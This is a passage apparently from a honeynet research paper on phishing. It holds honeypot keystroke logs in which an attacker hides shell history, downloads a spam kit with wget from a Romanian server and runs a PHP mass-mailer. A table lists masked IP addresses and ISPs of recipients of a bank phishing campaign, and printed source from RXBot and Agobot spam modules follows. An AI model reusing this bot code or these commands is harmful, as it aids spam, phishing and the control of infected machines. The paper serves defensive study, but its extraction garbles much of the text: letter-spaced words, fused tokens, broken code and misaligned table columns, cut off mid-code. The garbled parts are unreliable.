[ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] h t t p : / / 6 9 . 2 4 . X X X . X X X / t e s t i n g . p h p [ D A R R O W ] [ L A R R O W ] [ L A R R O W ] [ U A R R O W ] [ U A R R O W ] [ D A R R O W ] [ D A R R O W ] [ U A R R O W ] [ U A R R O W ] [ D A R R O W ] [ R A R R O W ] y

23/07/04 - 21:22. The attacker checks the network configuration of the honeypot and version of PHP installed:
[ 2 0 0 4 0 7 2 32 1 : 2 2 : 2 91 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s [ 2 0 0 4 0 7 2 32 1 : 2 2 : 3 11 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] p w d [ 2 0 0 4 0 7 2 32 1 : 2 5 : 0 61 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] / s b i n / i f c o n f i g [ 2 0 0 4 0 7 2 32 1 : 2 5 : 2 51 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] s e n s e [ 2 0 0 4 0 7 2 32 1 : 4 8 : 3 61 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] p h p [ 2 0 0 4 0 7 2 32 1 : 4 8 : 4 21 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] / s b i n / i f c o n f i g [ 2 0 0 4 0 7 2 32 2 : 1 0 : 2 61 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] s e n s e [ 2 0 0 4 0 7 2 32 2 : 2 8 : 3 21 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] a d e [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] q w [ 2 0 0 4 0 7 2 32 2 : 2 8 : 3 31 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] w

25/07/04 - 21:42. The attacker opens a second session, checks again if PHP is configured correctly on the honeypot and downloads a tool for sending spam email from the same Romanian web server:
[ 2 0 0 4 0 7 2 52 1 : 4 2 : 2 5x n t p s0 ] S S H 1 . 5 P u T T Y R e l e a s e 0 . 5 4 [ 2 0 0 4 0 7 2 52 1 : 4 2 : 4 6b a s h0 ] u n s e tH I S T F I L E [ 2 0 0 4 0 7 2 52 1 : 4 2 : 5 0b a s h0 ] c a t/ e t c / h o s t s [ 2 0 0 4 0 7 2 52 2 : 0 7 : 2 8b a s h0 ] p h p [ 2 0 0 4 0 7 2 52 2 : 0 7 : 3 2b a s h0 ] c d/ t m p [ 2 0 0 4 0 7 2 52 2 : 0 7 : 4 1b a s h0 ] w g e th o s t 2 . g o . r o / s e n d b a n k N E W . t g z [ 2 0 0 4 0 7 2 52 2 : 0 7 : 5 0b a s h0 ] t a rx z v fs e n d b a n k N E W . t g z & n b s p ; ;r mr fs e n d b a n k N E W . t g z

25/07/04 - 22:08. The attacker checks an input list email addresses and runs a PHP script to send spam email:
[ 2 0 0 4 0 7 2 52 2 : 0 8 : 0 0b a s h0 ] c ds e n d b a n k / [ 2 0 0 4 0 7 2 52 2 : 0 8 : 0 1b a s h0 ] l s [ 2 0 0 4 0 7 2 52 2 : 0 8 : 0 9b a s h0 ] c a tl i s t . [ 2 0 0 4 0 7 2 52 2 : 0 8 : 4 6b a s h0 ] l s [ 2 0 0 4 0 7 2 52 2 : 0 8 : 5 2b a s h0 ] p h pb a n k . p h p

25/07/04 - 22:10. The attacker edits the content of the spam message, points it a co-located Linux web server running an American student web site, and runs the PHP script to send spam email again:
[ 2 0 0 4 0 7 2 52 2 : 1 0 : 2 2b a s h0 ] p i c ob l a . t x t [ 2 0 0 4 0 7 2 52 2 : 1 0 : 2 6p i c o0 ] p h p [ 2 0 0 4 0 7 2 52 2 : 1 3 : 3 3p i c o0 ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] < s t r o n g > X X X . c o m < / s t r o n g > / . y [ 2 0 0 4 0 7 2 52 2 : 1 3 : 3 6b a s h0 ] p h pb a n k . p h p [ 2 0 0 4 0 7 2 52 2 : 2 4 : 4 8b a s h0 ] c d. . [ 2 0 0 4 0 7 2 52 2 : 2 4 : 4 9b a s h0 ] l s [ 2 0 0 4 0 7 2 52 2 : 2 4 : 5 3b a s h0 ] r mr fs e n d b a n k

The attackers initial test at 22:08:52 works as planned, with 5 test messages being successfully sent (although due to the outbound traffic restrictions on the Honeywall, further mass mailing attempts would fail). However, after 10 minutes wait the attacker cleans up and leaves without sending any further messages from this honeypot.

Phishing Incident Victims
In this side note we provide an overview of the source IP addresses of potential victims in the UK phishing attack against a major US bank described in phishing technique one. The data below was collected with the help of the compromised UK honeypot and network packet captures. Over a period of about 4 days we observed 265 inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All were potential victims of the phishing attack, but none actually submitted personal data and therefore the phishing attack was unsucessful. IP 4.138.NNN.NNN 4.224.NNN.NNN 4.235.NNN.NNN 4.239.NNN.NNN 12.202.NNN.NNN 12.217.NNN.NNN 12.218.NNN.NNN 24.16.NNN.NNN 24.58.NNN.NNN 24.59.NNN.NNN 24.62.NNN.NNN 24.90.NNN.NNN ISP Level 3 Level 3 Level 3 Level 3 AT&T; AT&T; AT&T; Comcast Cable Road Runner Road Runner Comcast Cable Road Runner Country OS US US US US US US US US US US US US Windows XP, 2000 SP2+ (NAT!) Windows 98 Windows XP, 2000 SP2+ (NAT!) Windows XP, 2000 SP2+ FreeBSD 4.7 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) UNKNOWN Windows XP Pro SP1, 2000 SP3 Windows XP Pro SP1, 2000 SP3 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)

24.93.NNN.NNN 24.107.NNN.NNN 24.129.NNN.NNN 24.140.NNN.NNN 24.154.NNN.NNN 24.160.NNN.NNN 24.161.NNN.NNN 24.162.NNN.NNN 24.163.NNN.NNN 24.165.NNN.NNN 24.166.NNN.NNN 24.208.NNN.NNN 24.209.NNN.NNN 24.220.NNN.NNN 24.231.NNN.NNN 24.239.NNN.NNN 24.243.NNN.NNN 63.165.NNN.NNN 63.192.NNN.NNN 64.12.NNN.NNN 64.33.NNN.NNN 64.58.NNN.NNN 64.136.NNN.NNN 64.136.NNN.NNN 64.136.NNN.NNN 64.161.NNN.NNN 64.216.NNN.NNN 64.222.NNN.NNN 65.78.NNN.NNN 65.166.NNN.NNN 65.204.NNN.NNN 65.221.NNN.NNN 65.229.NNN.NNN 66.38.NNN.NNN 66.41.NNN.NNN 66.45.NNN.NNN 66.61.NNN.NNN 66.67.NNN.NNN 66.68.NNN.NNN 66.82.NNN.NNN 66.170.NNN.NNN 66.188.NNN.NNN 67.5.NNN.NNN 67.23.NNN.NNN 67.38.NNN.NNN 67.66.NNN.NNN 67.122.NNN.NNN 67.160.NNN.NNN 67.164.NNN.NNN 67.167.NNN.NNN

Road Runner Charter Comms Comcast Cable Massillon Cable Armstrong Cable Road Runner Road Runner Road Runner Road Runner Road Runner Road Runner Road Runner Road Runner Midcontinent Comms Charter Comms Armstrong Cable Service Co LLC DIGITEL Pacific Bell AOL West Winconsin Telecomn Marlowe & Associates Juno Online Juno Online Juno Online Pacific Bell Internet SBC Internet Verizon Internet RCN Corporation Sprint Eagle Mountain Telecom Buckeye Cablevision UUNET

US US US US US US US US US US US US US US US US US

Windows XP Pro SP1, 2000 SP3 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 (NAT!) Windows XP, 2000 SP2+ Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) UNKNOWN Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP4, XP SP1 Windows XP Pro SP1, 2000 SP3 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 (firewall!) UNKNOWN Windows XP SP1, 2000 SP3 Windows XP/2000 Windows XP Pro SP1, 2000 SP3

Prob US OpenBSD 3.0 US US US US US US US US US US US US US US US Windows 2000 SP4, XP SP1 Linux 2.4 w/o timestamps Windows XP, 2000 SP2+ Windows 98 (2) (NAT!) OpenBSD 3.0 OpenBSD 3.0 OpenBSD 3.0 Windows XP Pro SP1, 2000 SP3 (NAT!) Windows XP Pro SP1, 2000 SP3 (NAT!) Windows 2000 SP4, XP SP 1 FreeBSD 4.7 Windows 98 FreeBSD 4.8 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP/2000 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP4, XP SP1 Windows XP Pro SP1, 2000 SP3 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 UNKNOWN Windows XP, 2000 SP2+ Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) (firewall!) Windows XP, 2000 SP2+ Windows XP Pro SP1, 2000 SP3 Windows XP, 2000 SP2+ Windows XP SP1, 2000 SP3 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 (NAT!) UNKNOWN

Brandenburg Telephone Company US Comcast Cable WholeSecurity, Inc Road Runner Road Runnner Road Runner Hughes Network Systems T-NET, Inc Charter Comms Qwest Adelphia Cable Comms Ameritech Electronic Commerce SBC Internet Services Pac Bell Internet Comcast Cable Comcast Cable Comcast Cable US US US US US US US US US US US US US US US US

68.10.NNN.NNN 68.14.NNN.NNN 68.32.NNN.NNN 68.53.NNN.NNN 68.88.NNN.NNN 68.89.NNN.NNN 68.94.NNN.NNN 68.103.NNN.NNN 68.109.NNN.NNN 68.205.NNN.NNN 68.254.NNN.NNN 69.23.NNN.NNN 69.48.NNN.NNN 69.59.NNN.NNN 69.132.NNN.NNN 69.133.NNN.NNN 69.134.NNN.NNN 69.135.NNN.NNN 69.135.NNN.NNN 69.151.NNN.NNN 69.162.NNN.NNN

Cox Communications Inc Cox Communications Inc Comcast Cable Comcast Cable SBC Internet Services SBC Internet Services SBC Internet Services Cox Communications Inc Cox Communications Inc Road Runner SBC Internet Services Choice One Comms Peak Inc Road Runner Road Runner Road Runner Road Runner Road Runner SBC Internet Services Adelphia Cable Comms

US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US US

Windows XP Pro SP1, 2000 SP3 FreeBSD 4.7 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 Windows 2000 SP4, XP SP 1 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 (NAT!) Windows XP Pro SP1, 2000 SP3 Windows 2000 SP4, XP SP1 UNKNOWN Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 Windows XP, 2000 SP2+ Windows XP/2000 via Cisco Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 UNKNOWN Windows 2000 SP4, XP SP1 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP Pro SP1, 2000 SP3 (NAT!) FreeBSD 4.7 Windows XP Pro SP1, 2000 SP3 Windows XP SP1, 2000 SP3 CacheFlow CacheOS 4.1 (up Linux 2.4 w/o timestamps Linux 2.4 w/o timestamps OpenBSD 3.0 Windows 2000 SP4, XP SP1 Windows XP, 2000 SP2+ Windows XP, 2000 SP2+ Windows 98 Windows 2000 SP4, XP SP1 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP, 2000 SP2+ Windows 2000 SP4, XP SP1 Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) Windows XP, 2000 SP2+ Windows XP Pro SP1, 2000 SP3 Windows XP, 2000 SP2+ Linux 2.4/2.6 (up BSD/OS 3.1 Windows XP, 2000 SP2+ Windows XP, 2000 SP2+ Windows XP Pro SP1, 2000 SP3 (NAT!) Windows XP, 2000 SP2+ Windows 98 Windows XP, 2000 SP2+ Linux 2.4/2.6 (up Windows XP, 2000 SP2+

137.229.NNN.NNN University of Alaska 141.154.NNN.NNN Verizon Internet 148.78.NNN.NNN Starband Comms

149.174.NNN.NNN CompuServe 152.163.NNN.NNN AOL 156.36.NNN.NNN 162.83.NNN.NNN US Bancorp Verizon Internet

166.102.NNN.NNN WRK Internet 166.102.NNN.NNN WRK Internet 169.207.NNN.NNN Executive PC, Inc 170.94.NNN.NNN State of Arkansas

172.131.NNN.NNN AOL 172.131.NNN.NNN AOL 204.95.NNN.NNN Sprint

204.210.NNN.NNN Road Runner 204.210.NNN.NNN Road Runner 205.162.NNN.NNN Buckeye Cablevision 206.148.NNN.NNN AGIS 206.196.NNN.NNN US West Internet Services 207.89.NNN.NNN 207.89.NNN.NNN NetLink Systems LLC NetLink Systems LLC

207.231.NNN.NNN Surewest Internet 208.60.NNN.NNN Local Link

208.187.NNN.NNN Lanset Comms 208.191.NNN.NNN SBC Internet 209.43.NNN.NNN IQuest Internet

209.131.NNN.NNN CenturyTel Internet Holdings Inc 209.206.NNN.NNN IQuest Internet 209.247.NNN.NNN Bend Cable 216.93.NNN.NNN Voyager Information Networks

216.228.NNN.NNN Bend Cable

US

Cisco Content Engine

Learning about phishing from bot source code
In this side note will will review the source code of some bots captured during our research and show several examples of how bots are being used to send out spam and phishing emails. 1. RXBot
[ . . . ] e l s ei f( s t r c m p ( " e m a i l " ,a [ s ] )= =0){ W O R Dv e r s i o n=M A K E W O R D ( 1 , 1 ) ; W S A D A T Aw s a D a t a ; c h a rs e r v e r [ 2 5 6 ] ,s e n d e r _ e m a i l [ 2 5 6 ] ,r e c p _ e m a i l [ 2 5 6 ] ,s u b j e c t [ 2 5 6 ] ,m y B u f [ 2 5 6 ] ,B i g B u f [ 1 0 2 4 ] ; i n tp o r t ,n R e t ; s t r c p y ( s e r v e r , a [ s + 1 ] ) ; p o r t=a t o i ( a [ s + 2 ] ) ; s t r c p y ( s e n d e r _ e m a i l , a [ s + 3 ] ) ; s t r c p y ( r e c p _ e m a i l , a [ s + 4 ] ) ; s t r c p y ( s u b j e c t , r e p l a c e s t r ( a [ s + 5 ] , " _ " , "" ) ) ; f W S A S t a r t u p ( v e r s i o n ,& w s a D a t a ; ) ; L P H O S T E N Tl p H o s t E n t r y ; l p H o s t E n t r y=f g e t h o s t b y n a m e ( s e r v e r ) ; S O C K E TM a i l S o c k e t ; M a i l S o c k e t=f s o c k e t ( A F _ I N E T ,S O C K _ S T R E A M ,I P P R O T O _ T C P ) ; S O C K A D D R _ I Ns a S e r v e r ; s a S e r v e r . s i n _ f a m i l y=A F _ I N E T ; s a S e r v e r . s i n _ a d d r=* ( ( L P I N _ A D D R ) * l p H o s t E n t r y > h _ a d d r _ l i s t ) ; s a S e r v e r . s i n _ p o r t=f h t o n s ( ( u n s i g n e ds h o r t ) p o r t ) ; s p r i n t f ( B i g B u f , " h e l o$ r n d n i c k \ n m a i lf r o m :< % s > \ n r c p tt o :< % s > \ n d a t a \ n s u b j e c t : % s \ n f r o m :% s \ n % s \ n . \ n " , s e n d e r _ e m a i l , r e c p _ e m a i l , s u b j e c t , s e n d e r _ e m a i l , s u b j e c t ) ; n R e t=f c o n n e c t ( M a i l S o c k e t ,( L P S O C K A D D R ) & s a S e r v e r ; ,s i z e o f ( s a S e r v e r ) ) ; n R e t=f r e c v ( M a i l S o c k e t ,m y B u f ,s i z e o f ( m y B u f ) ,0 ) ; n R e t=f s e n d ( M a i l S o c k e t , B i g B u f ,s t r l e n ( m y B u f ) ,0 ) ; n R e t=f r e c v ( M a i l S o c k e t ,m y B u f ,s i z e o f ( m y B u f ) ,0 ) ; f c l o s e s o c k e t ( M a i l S o c k e t ) ; f W S A C l e a n u p ( ) ; s p r i n t f ( s e n d b u f ," [ E M A I L ] :M e s s a g es e n tt o% s . " , r e c p _ e m a i l ) ; i f( ! s i l e n t )i r c _ p r i v m s g ( s o c k ,a [ 2 ] ,s e n d b u f ,n o t i c e ) ; a d d l o g ( s e n d b u f ) ; r e t u r nr e p e a t ; } [ . . . ]

2. Agobot - CanSpamAOL()
b o o lC a n S p a m A O L ( ){ i n ti R n d = b r a n d o m ( 1 ,4 ) ;c h a r* s z D N S ; i n ti I s M s g _ M a t c h e d = 0 ; / /H o wm u c ht h eA O Lb l o c k i n gm e s s a g eh a sb e e nm a t c h e di n% / /2 5 %a r ef o ro c c u r e n c eo fs t r i n g" p o s t m a s t e r . i n f o . a o l . c o m " / /2 0 %a r ef o ra ni m m e d i a t e5 5 4 / /1 0 %a r ef o ral i n ec o u n to f5 / /1 0 %a r ef o ro c c u r e n c eo fs t r i n g" ( R T R : D U ) " / /1 0 %a r ef o ro c c u r e n c eo fs t r i n g" n o ta c c e p t " / /5 %a r ef o ro c c u r e n c eo fs t r i n g" d y n a m i c "( o c c u r s2t i m e s ) / /5 %a r ef o ro c c u r e n c eo fs t r i n g" r e s i d e n t i a l "( o c c u r s2t i m e s ) / /5 %a r ef o ro c c u r e n c eo fs t r i n g" a r eu s i n gt o " s w i t c h ( i R n d ){ c a s e1 : s z D N S = " m a i l i n 0 1 . m x . a o l . c o m " ; b r e a k ; c a s e2 : s z D N S = " m a i l i n 0 2 . m x . a o l . c o m " ; b r e a k ; c a s e3 : s z D N S = " m a i l i n 0 3 . m x . a o l . c o m " ; b r e a k ; c a s e4 : s z D N S = " m a i l i n 0 4 . m x . a o l . c o m " ; b r e a k ; d e f a u l t : # i f d e fD B G C O N S O L E g _ c M a i n C t r l . m _ c C o n s D b g . L o g ( 9 ," C a n S p a m A O L ( ) :U n k n o w nv a l u e% di ns w i t c hs t a t e m e n t . \ n " ,i R n d ) ; # e n d i f b r e a k ;} i n ts A O L S o c k = D o T c p C o n n e c t ( s z D N S ,2 5 ) ;i f ( s A O L S o c k = = S O C K E T _ E R R O R )r e t u r nf a l s e ; i n ti C o u n t = 0 ;c h a rs z B u f [ 4 0 9 6 ] ;w h i l e ( r e c v _ l i n e ( s A O L S o c k ,s z B u f ,s i z e o f ( s z B u f ) ) ){ i f ( s t r s t r ( s z B u f ," 2 2 0 " )& &s t r s t r ( s z B u f ," E S M T P " ) )b r e a k ; i f ( s t r s t r ( s z B u f ," p o s t m a s t e r . i n f o . a o l . c o m " ) )i I s M s g _ M a t c h e d + = 2 5 ; i f ( s t r s t r ( s z B u f ," 5 5 4 " )& &i C o u n t = = 1 )i I s M s g _ M a t c h e d + = 2 0 ; i f ( s t r s t r ( s z B u f ," ( R T R : D U ) " ) )i I s M s g _ M a t c h e d + = 1 0 ; i f ( s t r s t r ( s z B u f ," n o ta c c e p t " ) )i I s M s g _ M a t c h e d + = 1 0 ; i f ( s t r s t r ( s z B u f ," d y n a m i c " ) )i I s M s g _ M a t c h e d + = 5 ; i f ( s t r s t r ( s z B u f ," r e s i d e n t i a l " ) )i I s M s g _ M a t c h e d + = 5 ; i f ( s t r s t r ( s z B u f ," a r eu s i n gt o " ) )i I s M s g _ M a t c h e d + = 5 ; i C o u n t + + ;} i f ( i C o u n t = = 5 )i I s M s g _ M a t c h e d + = 1 0 ; x W r i t e ( s A O L S o c k ," Q U I T \ n " ,s i z e o f ( " Q U I T \ n " ) ) ; b o o lb R e t V a l = f a l s e ; i f ( i I s M s g _ M a t c h e d< =5 )b R e t V a l = t r u e ;

x C l o s e ( s A O L S o c k ) ; r e t u r nb R e t V a l ; }

3. Agobot - spam logic
/ * A g o b o t 3-am o d u l a rI R Cb o tf o rW i n 3 2/L i n u x C o p y r i g h t( c )2 0 0 3A g o A l lr i g h t sr e s e r v e d . T h i si sp r i v a t es o f t w a r e ,y o um a yr e d i s t r i b u t ei tu n d e rt h et e r m so f t h eA P L ( A g o ' sP r i v a t eL i c e n s e )w h i c hf o l l o w s : R e d i s t r i b u t i o na n du s ei nb i n a r yf o r m s ,w i t ho rw i t h o u tm o d i f i c a t i o n , a r ep e r m i t t e dp r o v i d e dt h a tt h ef o l l o w i n gc o n d i t i o n sa r em e t : 1 .T h en a m eo ft h ea u t h o rm a yn o tb eu s e dt oe n d o r s eo rp r o m o t ep r o d u c t s d e r i v e df r o mt h i ss o f t w a r ew i t h o u ts p e c i f i cp r i o rw r i t t e np e r m i s s i o n . 2 .T h eb i n a r ym a yn o tb es o l da n d / o rg i v e na w a yf o rf r e e . 3 .T h el i c e n s e em a yo n l yc r e a t eb i n a r i e sf o rh i so w nu s a g e ,n o tf o ra n y t h i r dp a r t i e s . R e d i s t r i b u t i o na n du s ei ns o u r c ef o r m s ,w i t ho rw i t h o u tm o d i f i c a t i o n , a r en o tp e r m i t t e d . T H I SS O F T W A R EI SP R O V I D E DB YT H EA U T H O R` ` A SI S ' 'A N DA N YE X P R E S SO R I M P L I E DW A R R A N T I E S ,I N C L U D I N G ,B U TN O TL I M I T E DT O ,T H EI M P L I E DW A R R A N T I E S O FM E R C H A N T A B I L I T YA N DF I T N E S SF O RAP A R T I C U L A RP U R P O S EA R ED I S C L A I M E D . I NN OE V E N TS H A L LT H EA U T H O RB EL I A B L EF O RA N YD I R E C T ,I N D I R E C T , I N C I D E N T A L ,S P E C I A L ,E X E M P L A R Y ,O RC O N S E Q U E N T I A LD A M A G E S( I N C L U D I N G ,B U T N O TL I M I T E DT O ,P R O C U R E M E N TO FS U B S T I T U T EG O O D SO RS E R V I C E S ;L O S SO FU S E , D A T A ,O RP R O F I T S ;O RB U S I N E S SI N T E R R U P T I O N )H O W E V E RC A U S E DA N DO NA N Y T H E O R YO FL I A B I L I T Y ,W H E T H E RI NC O N T R A C T ,S T R I C TL I A B I L I T Y ,O RT O R T ( I N C L U D I N GN E G L I G E N C EO RO T H E R W I S E )A R I S I N GI NA N YW A YO U TO FT H EU S EO F T H I SS O F T W A R E ,E V E NI FA D V I S E DO FT H EP O S S I B I L I T YO FS U C HD A M A G E .* / # i n c l u d e" m a i n . h " # i n c l u d e" m a i n c t r l . h " # i n c l u d e" s m t p _ l o g i c . h " # i n c l u d e" s m t p . h " C S M T P _ L o g i c : : C S M T P _ L o g i c ( ){ m _ s z T y p e = " C S M T P _ L o g i c " ; m _ l E m a i l s . c l e a r ( ) ;m _ s E m a i l T e m p l a t e . A s s i g n ( " " ) ;m _ b S p a m m i n g = f a l s e ;m _ b T e m p l a t e S e t = f a l s e ; } C S M T P _ L o g i c : : ~ C S M T P _ L o g i c ( ){ m _ l E m a i l s . c l e a r ( ) ;m _ s E m a i l T e m p l a t e . A s s i g n ( " " ) ;m _ b S p a m m i n g = f a l s e ;m _ b T e m p l a t e S e t = f a l s e ; } v o i dC S M T P _ L o g i c : : I n i t ( ){ R E G C M D ( m _ c m d S e t L i s t , R E G C M D ( m _ c m d S e t T e m p l a t e , R E G C M D ( m _ c m d S t a r t , R E G C M D ( m _ c m d S t o p , R E G C V A R ( s p a m _ m a x t h r e a d s , R E G C V A R ( s p a m _ h t m l e m a i l , } b o o lC S M T P _ L o g i c : : H a n d l e C o m m a n d ( C M e s s a g e* p M s g ){ i f ( ! p M s g > s C m d . C o m p a r e ( " s p a m . s e t l i s t " ) ){ m _ s L i s t U R L . A s s i g n ( p M s g > s C h a t S t r i n g . T o k e n ( 1 ,"" ) ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " D o w n l o a d i n gn e we m a i ll i s t . " ,p M s g > s R e p l y T o . S t r ( ) ) ; S e t L i s t ( m _ s L i s t U R L ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " F i n i s h e dd o w n l o a d i n gn e we m a i ll i s t . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " s p a m . s e t t e m p l a t e " ) ){ m _ s T e m p l a t e U R L . A s s i g n ( p M s g > s C h a t S t r i n g . T o k e n ( 1 ,"" ) ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " D o w n l o a d i n gn e we m a i lt e m p l a t e . " ,p M s g > s R e p l y T o . S t r ( ) ) ; S e t T e m p l a t e ( m _ s T e m p l a t e U R L ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " F i n i s h e dd o w n l o a d i n gn e we m a i lt e m p l a t e . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " s p a m . s t a r t " ) ){ m _ b S p a m m i n g = t r u e ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " S t a r t e ds p a m m i n g . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " s p a m . s t o p " ) ){ m _ b S p a m m i n g = f a l s e ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " S t o p p e ds p a m m i n g . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ;} r e t u r nf a l s e ; } v o i dC S M T P _ L o g i c : : S e t L i s t ( C S t r i n g& s U R L ; ){ t r y{ u r lu U R L ; " s p a m . s e t l i s t " , " s p a m . s e t t e m p l a t e " , " s p a m . s t a r t " , " s p a m . s t o p " , " d o w n l o a d sa ne m a i ll i s t " , " d o w n l o a d sa ne m a i lt e m p l a t e " , " s t a r t st h es p a m m i n g " , " s t o p st h es p a m m i n g " , f a l s e , 0 ) ; f a l s e , 0 ) ; f a l s e , f a l s e , f a l s e , f a l s e , t h i s ) ; t h i s ) ; t h i s ) ; t h i s ) ;

" 8 " , " S p a mL o g i c-N u m b e ro ft h r e a d s " , " t r u e " ," S p a mL o g i c-S e n dH T M Le m a i l s " ,

C D o w n l o a d H e l p e r* p D l d H l p = n e wC D o w n l o a d H e l p e r ; i f ( ! P a r s e U R L ( s U R L ,& u U R L ; ) )r e t u r n ; p D l d H l p > m _ s H o s t . A s s i g n ( u U R L . s H o s t ) ;p D l d H l p > m _ s P a t h . A s s i g n ( u U R L . s R e q ) ; p D l d H l p > m _ s T a r g e t . A s s i g n ( " l i s t . t m p " ) ;p D l d H l p > m _ s R e p l y T o . A s s i g n ( " " ) ; p D l d H l p > m _ b E x e c u t e = f a l s e ;p D l d H l p > m _ b U p d a t e = f a l s e ;p D l d H l p > m _ b F T P = f a l s e ; p D l d H l p > m _ b S i l e n t = t r u e ;p D l d H l p > m _ b N o t i c e = f a l s e ;p D l d H l p > m _ b J o i n = f a l s e ; p D l d H l p > R u n ( ) ;d e l e t ep D l d H l p ; F I L E* f p = f o p e n ( " l i s t . t m p " ," r b " ) ; i f ( ! f p )r e t u r n ; i n ti F i l e S i z e = G e t F i l e S i z e ( f p ) ; c h a r* s z L i s t = n e wc h a r [ i F i l e S i z e + 1 ] ; m e m s e t ( s z L i s t ,0 ,i F i l e S i z e + 1 ) ; f r e a d ( s z L i s t ,s i z e o f ( c h a r ) ,i F i l e S i z e ,f p ) ; C S t r i n gs L i s t ( s z L i s t ) ;c h a r* s z L i s t C o p y = s L i s t . S t r ( ) ,* s z T e m p ; w h i l e ( t r u e ){ c h a r* s z C R L F = s t r s t r ( s z L i s t C o p y ," \ r " ) ; i f ( ! s z C R L F )s z C R L F = s t r s t r ( s z L i s t C o p y ," \ n " ) ; i f ( ! s z C R L F )b r e a k ; w h i l e ( * s z C R L F = = ' \ r ' ){* s z C R L F = ' \ 0 ' ;s z C R L F + + ;} w h i l e ( * s z C R L F = = ' \ n ' ){* s z C R L F = ' \ 0 ' ;s z C R L F + + ;} w h i l e ( * s z C R L F = = ' \ r ' ){* s z C R L F = ' \ 0 ' ;s z C R L F + + ;} c h a r* s z T o k e n = s z L i s t C o p y ;s z L i s t C o p y = s z C R L F ; i f ( ! s t r c m p ( s z T o k e n ," " ) )c o n t i n u e ; m _ l E m a i l s . p u s h _ b a c k ( C S t r i n g ( s z T o k e n ) ) ;} d e l e t e[ ]s z L i s t ;f c l o s e ( f p ) ; D e l e t e F i l e ( " l i s t . t m p " ) ; # i f d e fP t W 3 2 C a t c h A l l }P t W 3 2 C a t c h A l l{ # e l s e }c a t c 